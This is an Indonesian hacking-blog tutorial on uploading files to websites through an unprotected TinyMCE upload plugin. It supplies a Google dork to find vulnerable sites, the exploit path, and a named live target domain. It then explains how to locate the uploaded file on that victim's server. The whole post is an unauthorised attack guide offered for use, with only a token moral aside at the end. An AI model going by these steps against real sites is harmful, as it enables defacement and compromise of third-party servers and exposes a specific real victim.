Nah kali ini saya akan share lagi masih tentang remote file upload :-D hehe
yap ! tentunya masih teknik mudah dan sederhana :-D
langsung aja yuk cekibroot >>
Pertama seperti biasa gan buka dulu si Mbah Google
dan masukin Dork :
#Dork : "inurl:/scripts/tiny_mce/plugins/upload/upload.php" (Kembangin Lagi gan)
#Exploit : /scripts/tiny_mce/plugins/upload/upload.php
nah langsung saja klik yang mana saja gan :-D / hehe
masukin exploitnya :-D /
kalo vuln maka akan muncul halaman file managernya nanti ,, kalau misalkan acak- acakan halamannya gak apa - apa ko gan tetep masih bisa upload file
#spoiler :
Live Target :http://bee3.webmisr.net/scripts/tiny_mce/plugins/upload/upload.php
nah tinggak browser pilih file yang ingin diupload ,, biasanyasuport : File Image (jpg, gif , png) dll
nah untuk mengecek filenya exploit :
http://website.anu/src/tinymce_up/filekamu
atau kalau gak ketemu agan bisa inspect element pada file managernya atau Ctrl + U ,, terus cari file agan dengan ctrl+f
seperti ini :
Contoh : http://bee3.webmisr.net/src/tinymce_up/pelurukertas.jpg
Nah mungkin cukup segitu saja yang bisa saya sampaikan ,, selebihnya silahkan agan / aganwati kembangkan ^_^ hehe
Catatan : Jangan sepelekan ilmu , karena sekecil apapun itu gunakanlah untuk hal besar ^_^
Terimakasih telah berkunjung diblog kami ,, silahkan tinggalkan komentar untuk menghargai jerit payah penulis ^_^
See you . . ^_^
Impressive post ..!!!!!
ReplyDeleteFree Software Download